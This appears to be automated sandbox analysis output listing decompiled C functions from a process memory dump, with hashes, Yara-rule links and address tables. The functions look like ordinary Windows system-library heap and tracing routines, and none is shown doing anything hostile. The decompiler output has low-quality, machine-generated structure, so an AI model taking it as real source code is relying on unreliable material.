                                                          0x034b6ccb
                                                          0x034b6cd0
                                                          0x034b6cd1
                                                          0x034b6ce2
                                                          0x034b6ce2
                                                          0x034b6c69
                                                          0x034b6ced

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c4e7125246ded7e014685c0e02b0d49c1e7857474d4cd3eb84d24359f543151
                                                          • Instruction ID: 06af1b60742731eae4ff0427d74ae7a29a9b4734c5a199fd2cf88d4b2f9ef811
                                                          • Opcode Fuzzy Hash: 1c4e7125246ded7e014685c0e02b0d49c1e7857474d4cd3eb84d24359f543151
                                                          • Instruction Fuzzy Hash: F3218B75A00644AFC715DB69D880F6AB7B8FF48740F14006AF909DF791D638ED51CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034790AF, Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E034790AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0348D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0346E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03454620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0347F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0346A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                          0x034790af
                                                          0x034790b8
                                                          0x034790bb
                                                          0x034790bf
                                                          0x034790c2
                                                          0x034790c2
                                                          0x034790c8
                                                          0x034790cb
                                                          0x034790cd
                                                          0x034b14d7
                                                          0x034b14eb
                                                          0x034b14eb
                                                          0x00000000
                                                          0x034b14eb
                                                          0x034b14db
                                                          0x034b14e6
                                                          0x00000000
                                                          0x034b14f2
                                                          0x034b14e8
                                                          0x00000000
                                                          0x034b14e8
                                                          0x034790d8
                                                          0x034790da
                                                          0x034790dd
                                                          0x034790e5
                                                          0x00000000
                                                          0x03479139
                                                          0x034790fa
                                                          0x034790fe
                                                          0x03479142
                                                          0x00000000
                                                          0x03479142
                                                          0x03479104
                                                          0x03479107
                                                          0x0347910b
                                                          0x03479110
                                                          0x03479118
                                                          0x03479147
                                                          0x03479148
                                                          0x0347914f
                                                          0x03479150
                                                          0x03479151
                                                          0x03479152
                                                          0x03479156
                                                          0x0347915d
                                                          0x03479160
                                                          0x03479168
                                                          0x0347916c
                                                          0x034791bc
                                                          0x034791be
                                                          0x00000000
                                                          0x034791be
                                                          0x0347916e
                                                          0x03479173
                                                          0x03479176
                                                          0x00000000
                                                          0x00000000
                                                          0x0347917c
                                                          0x03479180
                                                          0x034791b5
                                                          0x00000000
                                                          0x034791b5
                                                          0x03479182
                                                          0x03479185
                                                          0x03479189
                                                          0x00000000
                                                          0x00000000
                                                          0x0347918e
                                                          0x03479190
                                                          0x03479198
                                                          0x00000000
                                                          0x00000000
                                                          0x034791a0
                                                          0x00000000
                                                          0x034791ad
                                                          0x034791ad
                                                          0x034791b0
                                                          0x034791b1
                                                          0x00000000
                                                          0x03479185
                                                          0x0347911a
                                                          0x0347911c
                                                          0x0347911f
                                                          0x03479125
                                                          0x03479127
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                          • Instruction ID: 4258f7bda343004d464f0a20ee9a16a8d648120228c785813a038244f064b2c9
                                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                          • Instruction Fuzzy Hash: CB217C75A00304EFEB20DF59C944AAAF7F8EB44310F14886BE999AF210D330AD548B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03463B7A, Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E03463B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x35284c4; // 0x0
				_v12 = 1;
				_v8 =  *0x35284c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x35284c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0347AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0347FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x35284c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x35284c4; // 0x0
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                          0x03463b89
                                                          0x03463b96
                                                          0x03463ba1
                                                          0x03463bab
                                                          0x03463bb5
                                                          0x03463bb9
                                                          0x034a6298
                                                          0x03463bbf
                                                          0x03463bc2
                                                          0x03463bc3
                                                          0x03463bc9
                                                          0x03463bca
                                                          0x03463bcc
                                                          0x03463bcd
                                                          0x03463bd4
                                                          0x03463bd6
                                                          0x03463bdb
                                                          0x03463bea
                                                          0x03463bf7
                                                          0x03463bfb
                                                          0x03463bff
                                                          0x03463c09
                                                          0x03463c0a
                                                          0x03463c0b
                                                          0x03463c0f
                                                          0x03463c14
                                                          0x03463c18
                                                          0x03463c18
                                                          0x03463bfb
                                                          0x03463c1b
                                                          0x03463c30
                                                          0x03463c30
                                                          0x03463c3d

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73f53ebcd07d0655ef6a941e364b1dd40a7cf48c774a4ef4c3b71d8dcccad95f
                                                          • Instruction ID: b162993558496e63afee80273618ddd9d63a9eac2a09b34dce450e04f71f3fc7
                                                          • Opcode Fuzzy Hash: 73f53ebcd07d0655ef6a941e364b1dd40a7cf48c774a4ef4c3b71d8dcccad95f
                                                          • Instruction Fuzzy Hash: 09217C73A00208AFC710DF98DD81F5ABBADFB44608F150069E909AF261D371AD069B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B6CF0, Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E034B6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03457D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03457D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3415c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0346F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0346F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E034B7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03452400( &_v52);
								}
								_t21 = L03452400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                          0x034b6cfb
                                                          0x034b6d00
                                                          0x034b6d02
                                                          0x034b6d06
                                                          0x034b6d0a
                                                          0x034b6d0e
                                                          0x034b6d19
                                                          0x034b6d2b
                                                          0x034b6d1b
                                                          0x034b6d24
                                                          0x034b6d24
                                                          0x034b6d33
                                                          0x034b6d39
                                                          0x034b6d46
                                                          0x034b6d4f
                                                          0x034b6d61
                                                          0x034b6d51
                                                          0x034b6d5a
                                                          0x034b6d5a
                                                          0x034b6d69
                                                          0x034b6d6b
                                                          0x034b6d6d
                                                          0x034b6d6f
                                                          0x034b6d6f
                                                          0x034b6d74
                                                          0x034b6d79
                                                          0x034b6d7a
                                                          0x034b6d7f
                                                          0x034b6d82
                                                          0x034b6d88
                                                          0x034b6d89
                                                          0x034b6d90
                                                          0x034b6d94
                                                          0x034b6da7
                                                          0x034b6db1
                                                          0x034b6db1
                                                          0x034b6dbb
                                                          0x034b6dbb
                                                          0x034b6d90
                                                          0x034b6d69
                                                          0x034b6d46
                                                          0x034b6dc6

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c077e9819003073576e2aad67b7fdfe2e42a369c716c17595e11d3c9c18a90d
                                                          • Instruction ID: 5d6b2108c2b91705a7ebdbaa555ed3d30b55ee83d07c43a689eb908c8acfd744
                                                          • Opcode Fuzzy Hash: 0c077e9819003073576e2aad67b7fdfe2e42a369c716c17595e11d3c9c18a90d
                                                          • Instruction Fuzzy Hash: 3321B3725047449FC711DF29C944BABB7ECAF81680F09096BBD409F261EB38D509C6BA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0350070D, Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E0350070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E035007DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E034FAFDE( &_v8,  &_v12);
					E03501293(_t38, _v28, _t60);
					if(E03457D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E034F14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                          0x0350071b
                                                          0x03500724
                                                          0x03500734
                                                          0x03500738
                                                          0x0350074b
                                                          0x0350074b
                                                          0x03500753
                                                          0x03500753
                                                          0x03500759
                                                          0x0350075d
                                                          0x03500774
                                                          0x03500779
                                                          0x0350077d
                                                          0x03500789
                                                          0x03500795
                                                          0x035007a7
                                                          0x03500797
                                                          0x035007a0
                                                          0x035007a0
                                                          0x035007af
                                                          0x035007c4
                                                          0x035007cd
                                                          0x035007cd
                                                          0x035007af
                                                          0x035007dc

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                          • Instruction ID: 32976d6275511b7b640807f3d1055bf944433cd05c39e731b8c030d782baaacb
                                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                          • Instruction Fuzzy Hash: AC21F23A2046009FD705DF18D880B6ABBA5FFC4350F08856EF9958F3D2D634D90ACB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B7794, Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E034B7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3527b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0347F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03457D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03479AE0();
					_t24 = L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                          0x034b7799
                                                          0x034b779a
                                                          0x034b779b
                                                          0x034b77a3
                                                          0x034b77ab
                                                          0x034b77ae
                                                          0x034b77b1
                                                          0x034b77b1
                                                          0x034b77bf
                                                          0x034b77c4
                                                          0x034b77c8
                                                          0x034b77ce
                                                          0x034b77d4
                                                          0x034b77e0
                                                          0x034b77e0
                                                          0x034b77d6
                                                          0x034b77d6
                                                          0x034b77de
                                                          0x00000000
                                                          0x00000000
                                                          0x034b77de
                                                          0x034b77e5
                                                          0x034b77f0
                                                          0x034b77f3
                                                          0x034b77f6
                                                          0x034b77fd
                                                          0x034b7800
                                                          0x034b780c
                                                          0x034b7818
                                                          0x034b782b
                                                          0x034b781a
                                                          0x034b7823
                                                          0x034b7823
                                                          0x034b7830
                                                          0x034b7831
                                                          0x034b7838
                                                          0x034b783d
                                                          0x034b783e
                                                          0x034b784f
                                                          0x034b784f
                                                          0x034b785a

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cf68c62368b9416af38cf84f60be37ab7e70fd829be901f8d10c726d06809061
                                                          • Instruction ID: 71ac1a3a83538ebb54a3e6e568b54148760e2dc02607e325028248a3e6d6bb22
                                                          • Opcode Fuzzy Hash: cf68c62368b9416af38cf84f60be37ab7e70fd829be901f8d10c726d06809061
                                                          • Instruction Fuzzy Hash: 78219276901604AFC725DF69D880E9BBBB8EF88340F14056EF90ACF750D634E900CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0345AE73, Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E0345AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03457D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03457D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03457D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03457D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E034B7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                          0x0345ae78
                                                          0x0345ae7c
                                                          0x0345ae7e
                                                          0x0345ae81
                                                          0x0345ae86
                                                          0x0345ae8d
                                                          0x034a2691
                                                          0x0345ae93
                                                          0x0345ae93
                                                          0x0345ae93
                                                          0x0345ae98
                                                          0x0345ae9d
                                                          0x034a26a2
                                                          0x034a26b4
                                                          0x034a26a4
                                                          0x034a26ad
                                                          0x034a26ad
                                                          0x034a26b9
                                                          0x00000000
                                                          0x034a26bb
                                                          0x00000000
                                                          0x034a26bb
                                                          0x0345aea3
                                                          0x0345aea3
                                                          0x0345aea3
                                                          0x0345aeaa
                                                          0x034a26c0
                                                          0x034a26c9
                                                          0x034a26c9
                                                          0x0345aeb3
                                                          0x034a26d4
                                                          0x034a26e1
                                                          0x00000000
                                                          0x00000000
                                                          0x034a26e7
                                                          0x034a26ee
                                                          0x034a26f0
                                                          0x034a26f9
                                                          0x034a26f9
                                                          0x034a2702
                                                          0x034a2708
                                                          0x034a2708
                                                          0x034a270b
                                                          0x034a270f
                                                          0x034a2711
                                                          0x034a2711
                                                          0x034a2725
                                                          0x034a2725
                                                          0x00000000
                                                          0x0345aeb9
                                                          0x0345aeb9
                                                          0x0345aebf
                                                          0x0345aebf
                                                          0x0345aeb3

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                          • Instruction ID: 241142d71f15287e77f4075473b0d181936f35f4f6db55803237eefbe23a0ad9
                                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                          • Instruction Fuzzy Hash: 74210431A42A849FD712DB29C944B2677E8EF54340F0D04E2EC048F7A3D774DC41D6A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346FD9B, Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E0346FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E034476E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                          0x0346fd9b
                                                          0x0346fda0
                                                          0x0346fda1
                                                          0x0346fdab
                                                          0x0346fdad
                                                          0x0346fdb0
                                                          0x0346fdb8
                                                          0x0346fe0f
                                                          0x0346fde6
                                                          0x0346fde9
                                                          0x0346fdec
                                                          0x034ac0c0
                                                          0x0346fdfe
                                                          0x0346fe06
                                                          0x0346fe06
                                                          0x034ac0c8
                                                          0x0346fe2d
                                                          0x0346fe2d
                                                          0x00000000
                                                          0x0346fe2d
                                                          0x034ac0d1
                                                          0x034ac0e0
                                                          0x034ac0e5
                                                          0x034ac0e5
                                                          0x034ac0e8
                                                          0x00000000
                                                          0x034ac0e8
                                                          0x0346fdf4
                                                          0x00000000
                                                          0x00000000
                                                          0x0346fdf6
                                                          0x0346fdfa
                                                          0x0346fe1a
                                                          0x0346fe1f
                                                          0x0346fe1f
                                                          0x0346fdfc
                                                          0x00000000
                                                          0x0346fdfc
                                                          0x0346fdcc
                                                          0x0346fdd0
                                                          0x0346fe26
                                                          0x00000000
                                                          0x0346fe26
                                                          0x0346fdd8
                                                          0x0346fddb
                                                          0x0346fddd
                                                          0x0346fde0
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                          • Instruction ID: 29b79eab937c43fe3ee03899e9a1b2ca3ffe22f52089b13a68dbcf7668d90951
                                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                          • Instruction Fuzzy Hash: 1621AF71601A40DFC730CF4AE540A66FBE6EB94A10F24807FE9868F711D730AC05CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346B390, Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E0346B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03452280(_t12, 0x3528608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E034700C2(0x3528608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                          0x0346b395
                                                          0x0346b3a2
                                                          0x0346b3a5
                                                          0x0346b3aa
                                                          0x0346b3b2
                                                          0x0346b3ba
                                                          0x0346b3bd
                                                          0x0346b3c0
                                                          0x0346b3c4
                                                          0x0346b3c9
                                                          0x034aa3e9
                                                          0x034aa3ed
                                                          0x034aa3f0
                                                          0x034aa3ff
                                                          0x034aa403
                                                          0x034aa409
                                                          0x00000000
                                                          0x00000000
                                                          0x034aa40b
                                                          0x034aa40b
                                                          0x034aa40f
                                                          0x034aa415
                                                          0x034aa423
